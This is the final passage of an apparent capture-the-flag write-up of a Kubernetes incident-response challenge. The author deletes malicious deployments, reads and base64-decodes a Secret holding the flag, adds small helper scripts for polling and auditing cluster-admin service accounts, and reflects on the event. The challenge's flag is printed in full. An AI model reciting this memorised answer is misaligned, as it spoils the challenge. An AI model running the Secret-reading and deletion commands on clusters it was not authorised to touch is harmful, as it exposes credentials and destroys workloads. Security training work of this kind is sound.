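  kubectl -n albatross-processor delete deployment albatross-processor || return 1
}
```

Deleting the operator before its custom resources could leave those resources stuck if they carry finalizers the operator is meant to clear. That is one reason to keep the order that already worked here.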

incident-responder@albatross-terminal:/$ kubectl -n albatross-api delete deployment albatross-api
deployment.apps "albatross-api" deleted
incident-responder@albatross-terminal:/$ kubectl -n albatross-processor delete deployment albatross-processor
deployment.apps "albatross-processor" deleted
incident-responder@albatross-terminal:/$ kubectl -n albatross-dmz get secret
No resources found in albatross-dmz namespace.

Still nothing, and I start wondering whether I’ve missed a workload somewhere. However, after a few minutes of tapping up+enter while pondering, the final flag appears.

incident-responder@albatross-terminal:/$ kubectl -n albatross-dmz get secret
NAME   TYPE     DATA   AGE
flag   Opaque   1      6s
incident-responder@albatross-terminal:/$ kubectl -n albatross-dmz get secret -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: ZmxhZ19jdGZ7VEhFX0tSQUtFTlNfR1JJUF9IQVNfQkVFTl9SRU1PVkVEX0FMQkFUUk9TU19GUkVFRH0=
  kind: Secret
  metadata:
    creationTimestamp: "2024-03-28T15:01:01Z"
    name: flag
    namespace: albatross-dmz
    resourceVersion: "5303"
    uid: 5ef6c581-fc21-484e-835e-348624a8524a
  type: Opaque
kind: List
metadata:
  resourceVersion: ""
incident-responder@albatross-terminal:/$ base64 -d <<< ZmxhZ19jdGZ7VEhFX0tSQUtFTlNfR1JJUF9IQVNfQkVFTl9SRU1PVkVEX0FMQkFUUk9TU19GUkVFRH0= ; echo
flag_ctf{THE_KRAKENS_GRIP_HAS_BEEN_REMOVED_ALBATROSS_FREED}
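Rather than tapping up+enter, a small polling loop can wait for the secret and decode it in one go. This is a sketch that assumes the secret keeps the name flag and the data key flag seen above. wait_for_flag is a hypothetical helper name, and base64 -d is the same GNU coreutils flag used above.

```shell
# Sketch: poll until the "flag" Secret exists, then print its decoded value.
# Usage: wait_for_flag [namespace] [poll-interval-seconds]
wait_for_flag() {
  wff_ns=${1:-albatross-dmz}
  wff_interval=${2:-5}
  # kubectl exits non-zero while the Secret does not exist yet.
  until kubectl -n "$wff_ns" get secret flag >/dev/null 2>&1; do
    sleep "$wff_interval"
  done
  # Extract only the base64 value with JSONPath, then decode it.
  kubectl -n "$wff_ns" get secret flag -o jsonpath='{.data.flag}' | base64 -d
  echo
}
```

Running wait_for_flag albatross-dmz 5 would then block until the secret is created and print the flag, without needing the -o yaml output at all.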

When I talked to ControlPlane afterwards about the first flag, it turned out it was in the metadata of the malicious cluster admin service account found earlier. Because I went straight to its permissions instead of outputting the full YAML for that service account, I missed the originally intended method.
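The check I skipped would look something like this: find the service accounts bound to cluster-admin and dump their full YAML, labels and annotations included, rather than only their permissions. This sketch assumes the malicious account was bound to the built-in cluster-admin ClusterRole through a ClusterRoleBinding. An account granted access via a custom role or a namespaced RoleBinding would not show up. dump_cluster_admin_sas is a hypothetical helper name.

```shell
# Sketch: print the full YAML of every ServiceAccount that a ClusterRoleBinding
# ties to the built-in cluster-admin ClusterRole.
dump_cluster_admin_sas() {
  # Emits one "<namespace> <name>" line per ServiceAccount subject.
  kubectl get clusterrolebindings -o jsonpath='{range .items[?(@.roleRef.name=="cluster-admin")]}{range .subjects[?(@.kind=="ServiceAccount")]}{.namespace}{" "}{.name}{"\n"}{end}{end}' |
    while read -r sa_ns sa_name; do
      # Skip blank lines.
      [ -n "$sa_name" ] || continue
      echo "--- $sa_ns/$sa_name"
      # Full object, so metadata such as annotations is not missed.
      kubectl -n "$sa_ns" get serviceaccount "$sa_name" -o yaml </dev/null
    done
}
```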

Conclusions

That was an immensely fun CTF, so once again, massive props to ControlPlane. It was slightly different from their earlier CTFs, as they’ve branched out a tad with the scenarios. For example, the first challenge was mainly CI/CD and done in a browser instead of a terminal, and the third was a sizable IR-based scenario. The change of pace compared to a challenge like Seven Seas from their previous CTF was welcome: Seven Seas felt like lots of tiny back-to-back steps, whereas these were fewer, larger ones. The CI/CD challenge did have some of those tiny steps, where I had to iteratively change the deployment to bypass each issue, but with a build time of a minute or two it didn’t feel as back-to-back.

Once again, I got first place, but… once again, no more prizes for me as I’ve already got all their prizes 😂